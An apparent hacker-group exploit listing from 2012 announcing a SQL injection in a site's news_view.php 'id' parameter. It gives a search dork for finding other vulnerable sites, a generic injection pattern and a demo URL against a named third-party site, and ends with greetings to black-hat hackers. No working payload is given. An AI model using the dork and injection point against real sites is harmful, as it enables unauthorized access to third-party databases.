Brother Bear suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
75dcb11db9fe447b9cb97c9b3d7972790a98c8f39db0f57468071ff35a7016a6
################################################################
----------------------------------------------------------------
Brother Bear SQL Injection Vulnerability
----------------------------------------------------------------
################################################################
# Exploit Title : Brother Bear SQL Injection Vulnerability
# Author : Hack Center Security Team
# Discovered By : Net.W0lf
# Software Link : [ www.brotherbear.co.th ]
# Date : 9/21/2012
# E-Mail : Bl4ck.Intell@gmail.com & Net-W0lf@att.net
# DorK : "/news_view.php?id="
################################################################
----------------------------------------------------------------
+-----------------------+
| SQL Injection |
+-----------------------+
Expl0!T :
[TaRgeT]/news_view.php?id=[SQl]
D3m0:
www.chemmin.com/news_view.php?id='
GreetZ To :
| Am!r | B3HZ4D | And All Iranian Black Hat HackerZ
Hack-Center
===========================================# End #=============================================